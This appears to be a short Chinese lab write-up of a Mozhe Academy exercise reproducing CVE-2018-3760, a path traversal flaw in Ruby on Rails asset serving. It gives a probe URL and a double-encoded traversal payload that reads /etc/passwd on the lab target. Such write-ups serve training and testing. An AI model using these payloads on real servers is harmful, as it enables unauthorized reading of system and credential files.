墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

admin and root2023-11-07 14:15

打开 web 页面:

发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:

cs 复制代码 
/assets/file:%2f%2f/etc/passwd

根据报错路劲构造 payload:

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

cs 复制代码 
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
相关推荐
AORO_BEIDOU11 分钟前
遨游科普:三防平板是什么?应用在什么场景?
网络·安全·电脑·信息与通信
独行soc28 分钟前
2025年渗透测试面试题总结-安恒[实习]安全服务工程师(题目+回答)
linux·数据库·安全·web安全·面试·职场和发展·渗透测试
鬣主任39 分钟前
入职软件开发与实施工程师了后........
后端
2501_9160074741 分钟前
没有 Mac,我如何用 Appuploader 完成 iOS App 上架
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_916013741 小时前
App 发布后才想起安全?iOS 后置混淆的实战方法与工具路线(含 Ipa Guard 应用体验)
websocket·网络协议·tcp/ip·http·网络安全·https·udp
小峰编程1 小时前
Python函数——万字详解
linux·运维·服务器·开发语言·前端·网络·python
Swift社区1 小时前
Feature Toggle 不再乱:如何设计一个干净、安全、可控的特性开关系统?
安全
Dachui_11221 小时前
华为鸿蒙电脑发布,企业运营效率可以提高吗?
安全·华为
hao_wujing1 小时前
人工智能视角下的安全:可视化如何塑造恶意软件检测
人工智能·安全
白码低代码1 小时前
质检LIMS系统检测数据可视化大屏 全流程提效 + 合规安全双保障方案
安全·信息可视化·lims·实验室管理系统
热门推荐
01从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05组基轨迹建模 GBTM的介绍与实现(Stata 或 R)06Coze扣子平台完整体验和实践(附国内和国际版对比)07Ubuntu24.04安装中文输入法08YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU09DeepSeek各版本说明与优缺点分析10深度学习基础--ResNet网络的讲解,ResNet50的复现(pytorch)以及用复现的ResNet50做鸟类图像分类